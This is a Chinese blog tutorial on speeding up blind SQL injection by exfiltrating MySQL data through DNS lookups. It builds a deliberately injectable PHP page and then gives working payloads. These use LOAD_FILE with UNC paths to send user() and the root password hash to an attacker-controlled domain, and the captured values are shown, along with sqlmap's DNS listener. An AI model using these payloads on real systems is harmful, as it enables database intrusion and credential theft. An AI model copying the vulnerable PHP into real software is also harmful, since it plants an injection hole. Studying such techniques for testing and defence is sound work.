突破延迟注入和盲注速度限制，利用dns注入快速获取数据

dns注入就是通过数据库对域名发起dns解析请求来达到快速获取数据目的。

原理：





发个图先自己体会下

通常在存在一个没有数据回显的注入点进行注入时，我们需要使用延迟注入或者盲注(布尔注入),这种注入速度非常慢，需要一个一字符猜解，而且很容易搞挂网站，这时候我们怎么快速获取数据呢？下面我就来详细讲解下mysql的dns注入操作步骤。

要准备的东西：

域名2个，vps一台(装好sqlmap)

没有上面的东西可以用cloudeye,这里有个免费的http://ceye.io/

首先来到我们的第一个域名md5crack.cn修改域名dns服务器





这里我把域名dns改成了我第二个域名test.itgou.club，然后把test.itgou.club域名解析到自己的vps的ip上。

然后等待dns生效。

然后本地搭建个注入点(inject.php)进行测试，代码如下：

1

<?php

2	$link = mysql_connect( "localhost" , "root" , "root" );

3	mysql_select_db( "mysql" , $link );

4	$sql = "select password from user where user='{$_GET['user']}'" ;

5	echo $sql ;

6	mysql_query( $sql );

7

?>

可以看到这个注入点除了延迟注入，没其他办法获取数据了，但是我们有了dns注入就可以不用延迟注入了。

然后来ssh登录到我们的vps,进入sqlmap的sqlmap/lib/request/目录下





这里有个dns.py，这个是干什么用的呢，这个是用来监听53端口(dns端口)的一个脚本，用他来获取数据。

然后我们运行这个脚本，监听53端口





访问注入点：http://localhost/inject.php?user=root





开始注入，首先禁用本地dns缓存服务：





提交

http://localhost/inject.php? user =123 ' and if((SELECT LOAD_FILE(CONCAT(' \\\\ ',(SELECT hex(user())),' .md5crack.cn\\foobar'))),1,1)%23

成功接收到了726F6F74406C6F63616C686F7374，用小葵转换工具转换一下：





为啥要进行hex(user())？ 你觉得 root@localhost.md5crack.cn这样能解析吗，所以我们需要进行hex编码一下。

接下来获取账号密码,提交：

http://localhost/inject.php? user =123 ' and if((SELECT LOAD_FILE(CONCAT(' \\\\ ',(SELECT concat(user,' _ ',mid(password,2,41)) from user where user=' root ' limit 1),' .md5crack.cn\\foobar'))),1,1)%23

成功获取到：root_81F5E21E35407D884A6CD4A731AEBFB6AF209E1B

需要注意的两点：

1.域名前缀长度限制在63个字符，解决办法是用mid()函数来获取。

2.域名前缀不支持一些特殊字符，如*,解决办法是用hex()或者其他加密函数，获取到数据后再解密。

sqlmap也提供了这种注入方法,参数：–dns-domain

参考文章：http://drops.wooyun.org/tips/5283

文 / admin

分享到

1 COMMENTS



2016/05/12

好书推荐

回复

进来看看、支持一下